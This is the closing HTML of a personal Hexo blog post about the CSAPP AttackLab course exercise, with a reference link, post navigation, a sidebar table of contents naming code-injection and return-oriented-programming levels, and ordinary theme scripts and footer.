<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/C__C_/article/details/111308959">CSAPP实验——AttackLab_csapp attack lab-CSDN博客</a></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/CSAPP/" rel="tag"># CSAPP</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2024/03/05/CSAPP-Lab2/" rel="prev" title="CSAPP BombLab">
      <i class="fa fa-chevron-left"></i> CSAPP BombLab
    </a></div>
      <div class="post-nav-item">
    <a href="/2024/03/16/CSAPP-Lab4/" rel="next" title="CSAPP ArchLab">
      CSAPP ArchLab <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%B3%A8%E6%84%8F%E4%BA%8B%E9%A1%B9"><span class="nav-number">1.</span> <span class="nav-text">注意事项</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Code-Injection-Attacks"><span class="nav-number">2.</span> <span class="nav-text">Code Injection Attacks</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Level-1"><span class="nav-number">3.</span> <span class="nav-text">Level 1</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Solution"><span class="nav-number">3.1.</span> <span class="nav-text">Solution</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Result"><span class="nav-number">3.2.</span> <span class="nav-text">Result</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Level-2"><span class="nav-number">4.</span> <span class="nav-text">Level 2</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Solution-1"><span class="nav-number">4.1.</span> <span class="nav-text">Solution</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Result-1"><span class="nav-number">4.2.</span> <span class="nav-text">Result</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Level-3"><span class="nav-number">5.</span> <span class="nav-text">Level 3</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Solution-2"><span class="nav-number">5.1.</span> <span class="nav-text">Solution</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Result-2"><span class="nav-number">5.2.</span> <span class="nav-text">Result</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Reference"><span class="nav-number">5.3.</span> <span class="nav-text">Reference</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Return-Oriented-Programming"><span class="nav-number">6.</span> <span class="nav-text">Return-Oriented Programming</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Level-4"><span class="nav-number">7.</span> <span class="nav-text">Level 4</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Solution-3"><span class="nav-number">7.1.</span> <span class="nav-text">Solution</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Result-3"><span class="nav-number">7.2.</span> <span class="nav-text">Result</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Level-5"><span class="nav-number">8.</span> <span class="nav-text">Level 5</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Solution-4"><span class="nav-number">8.1.</span> <span class="nav-text">Solution</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Result-4"><span class="nav-number">8.2.</span> <span class="nav-text">Result</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#References"><span class="nav-number">9.</span> <span class="nav-text">References</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">yiweiBoi</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">16</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">yiweiBoi</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
